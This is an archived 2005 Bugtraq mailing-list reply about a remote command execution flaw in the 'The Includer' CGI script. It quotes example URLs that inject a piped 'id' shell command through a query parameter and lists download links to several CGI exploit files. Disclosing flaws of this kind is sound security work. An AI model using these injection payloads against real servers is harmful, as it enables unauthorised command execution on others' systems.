lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <19324451864.20050308084637@mail.ru> Date: Tue, 8 Mar 2005 08:46:37 +0300 From: BoI base <postbase@...l.ru> To: Francisco Alisson <dominusvis@...ck21.com.br> Cc: bugtraq@...urityfocus.com Subject: Re: Remote Command Execution FA> Remote Command Execution FA> Script: The Includer ( www.smarterscripts.com/includer/ ) FA> Remote Command Execution on: FA> Example I.: www.host-vulnerable.com/includer.cgi?|id| FA> Example II.: www.host-vulnerable.com/includer.cgi?template=|id| cgi-"exploits" for SmarterScripts Stuff: (placed on http://www.boiteam.net/?x=downloads) inc10fg.cgi http://www.boiteam.net/?download=file&id=5 inc11pb.cgi http://www.boiteam.net/?download=file&id=6 inc11fg.cgi http://www.boiteam.net/?download=file&id=7 exec10fi.cgi http://www.boiteam.net/?download=file&id=8 -- Best regards, Xanders mailto:postbase@...l.ru